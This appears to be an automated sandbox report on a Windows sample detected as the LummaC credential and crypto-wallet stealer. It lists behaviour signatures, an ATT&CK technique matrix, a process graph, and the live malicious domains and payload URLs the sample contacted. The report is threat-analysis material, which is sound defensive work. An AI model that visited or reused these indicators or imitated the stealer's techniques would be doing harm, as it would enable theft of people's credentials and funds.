            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: Hc.comBinary or memory string: WIN_81
            Source: Hc.comBinary or memory string: WIN_XP
            Source: Developers.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Hc.comBinary or memory string: WIN_XPe
            Source: Hc.comBinary or memory string: WIN_VISTA
            Source: Hc.comBinary or memory string: WIN_7
            Source: Hc.comBinary or memory string: WIN_8
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Hc.com PID: 7836, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002E2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_002E2263
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002E1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_002E1C61

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		21
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		2
            Valid Accounts            		1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol41
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		Logon Script (Windows)2
            Valid Accounts            		2
            Obfuscated Files or Information            		Security Account Manager13
            File and Directory Discovery            		SMB/Windows Admin Shares21
            Input Capture            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login Hook21
            Access Token Manipulation            		1
            DLL Side-Loading            		NTDS37
            System Information Discovery            		Distributed Component Object Model3
            Clipboard Data            		115
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
            Process Injection            		11
            Masquerading            		LSA Secrets131
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Valid Accounts            		Cached Domain Credentials121
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
            Virtualization/Sandbox Evasion            		DCSync4
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580131 Sample: Setup.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 46 hungrypaster.click 2->46 48 neqi.shop 2->48 50 2 other IPs or domains 2->50 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Antivirus detection for URL or domain 2->64 66 6 other signatures 2->66 10 Setup.exe 21 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 38 C:\Users\user\AppData\Local\Temp\...\Hc.com, PE32 12->38 dropped 70 Drops PE files with a suspicious file extension 12->70 16 Hc.com 12->16         started        20 extrac32.exe 22 12->20         started        23 cmd.exe 2 12->23         started        25 8 other processes 12->25 signatures7 process8 dnsIp9 40 hungrypaster.click 188.114.97.6, 443, 49742, 49743 CLOUDFLARENETUS European Union 16->40 42 kliptizq.shop 104.21.84.113, 443, 49751 CLOUDFLARENETUS United States 16->42 44 neqi.shop 172.67.169.205, 443, 49750 CLOUDFLARENETUS United States 16->44 52 Suspicious powershell command line found 16->52 54 Query firmware table information (likely to detect VMs) 16->54 56 Found many strings related to Crypto-Wallets (likely being stolen) 16->56 58 4 other signatures 16->58 27 powershell.exe 21 16->27         started        30 powershell.exe 16->30         started        36 C:\Users\user\AppData\Local\Temp\Adaptor, DOS 20->36 dropped file10 signatures11 process12 signatures13 68 Loading BitLocker PowerShell Module 27->68 32 conhost.exe 27->32         started        34 conhost.exe 30->34         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Setup.exe6%VirustotalBrowse
            Setup.exe0%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\280366\Hc.com0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\Adaptor0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://kliptizq.shop:443/int_clp_ldr_sha.txt100%Avira URL Cloudmalware
            https://hungrypaster.click:443/api.default-release/key4.dbPK0%Avira URL Cloudsafe
            https://kliptizq.shop/(W#100%Avira URL Cloudmalware
            https://hungrypaster.click:443/apitPK0%Avira URL Cloudsafe
            https://kliptizq.shop/100%Avira URL Cloudmalware
            https://neqi.shop/sdgjyut/psh.txt100%Avira URL Cloudmalware
            https://neqi.shop/100%Avira URL Cloudmalware
            https://hungrypaster.click:443/api0%Avira URL Cloudsafe
            https://hungrypaster.click/0%Avira URL Cloudsafe
            hungrypaster.click0%Avira URL Cloudsafe
            https://neqi.shop:443/sdgjyut/psh.txt100%Avira URL Cloudmalware
            https://neqi.shop/sdgjyut/psh.txto100%Avira URL Cloudmalware
            https://neqi.shop/BJ100%Avira URL Cloudmalware
            http://crl.microb0%Avira URL Cloudsafe
            https://hungrypaster.click/api0%Avira URL Cloudsafe
            https://hungrypaster.click:443/api3r78r106r115r115r112r115r43r69r106r103r103r102r115r102r111r100r1020%Avira URL Cloudsafe
            https://neqi.shop/sdgjyut/psh.txtk100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            hungrypaster.click
            		188.114.97.6
            		truetrue
              		unknown
              kliptizq.shop
              		104.21.84.113
              		truefalse
                		high
                neqi.shop
                		172.67.169.205
                		truefalse
                  		high
                  PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    curverpluch.latfalse
                      		high
                      slipperyloo.latfalse
                        		high
                        tentabatte.latfalse
                          		high
                          hungrypaster.clicktrue
                          • Avira URL Cloud: safe
                          		unknown
                          manyrestro.latfalse
                            		high
                            https://neqi.shop/sdgjyut/psh.txtfalse
                            • Avira URL Cloud: malware
                            		unknown
                            bashfulacid.latfalse
                              		high
                              wordyfindy.latfalse
                                		high
                                shapestickyr.latfalse
                                  		high
                                  talkynicer.latfalse
                                    		high
                                    https://kliptizq.shop/int_clp_ldr_sha.txtfalse
                                      		high
                                      https://hungrypaster.click/apitrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabHc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://hungrypaster.click:443/api.default-release/key4.dbPKHc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://kliptizq.shop/Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://hungrypaster.click/Hc.com, 0000000B.00000003.2067214936.00000000043A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsps.ssl.com0Setup.exefalse
                                                		high
                                                https://www.cloudflare.com/learning/access-management/phishhZpowershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Setup.exefalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_Setup.exefalse
                                                          		high
                                                          https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-cpowershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.autoitscript.com/autoit3/Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drfalse
                                                              		high
                                                              https://aka.ms/winsvr-2022-pshelphZpowershell.exe, 00000010.00000002.2334301446.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2334301446.0000000005957000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Setup.exefalse
                                                                  		high
                                                                  http://x1.c.lencr.org/0Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.i.lencr.org/0Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.cloudflare.com/learning/access-management/phishpowershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://contoso.com/powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.ssl.com/repository0Setup.exefalse
                                                                                  		high
                                                                                  https://www.cloudflare.com/5xx-error-landinghZpowershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://support.mozilla.org/products/firefoxgro.allHc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.cloudflare.com/5xx-error-landingmanceYpowershell.exe, 00000012.00000002.2253287573.000000000327F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoHc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://hungrypaster.click:443/apiHc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.cloudflare.com/learning/access-management/phishing-atX)powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://hungrypaster.click:443/apitPKHc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://neqi.shop/Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://contoso.com/Iconpowershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.autoitscript.com/autoit3/XHc.com, 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Developers.8.drfalse
                                                                                                                		high
                                                                                                                http://ocsp.rootca1.amazontrust.com0:Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://nsis.sf.net/NSIS_ErrorErrorSetup.exefalse
                                                                                                                      		high
                                                                                                                      https://www.ecosia.org/newtab/Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://kliptizq.shop:443/int_clp_ldr_sha.txtHc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://kliptizq.shop/(W#Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blankpowershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://ac.ecosia.org/autocomplete?q=Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://neqi.shop:443/sdgjyut/psh.txtHc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://neqi.shop/BJHc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://aka.ms/pscore6lBdqpowershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://hungrypaster.click:443/api3r78r106r115r115r112r115r43r69r106r103r103r102r115r102r111r100r102Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://neqi.shop/sdgjyut/psh.txtoHc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    http://crl.microbpowershell.exe, 00000012.00000002.2255979594.0000000007896000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://support.microsofHc.com, 0000000B.00000003.2044510092.00000000044A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://neqi.shop/sdgjyut/psh.txtkHc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Setup.exefalse
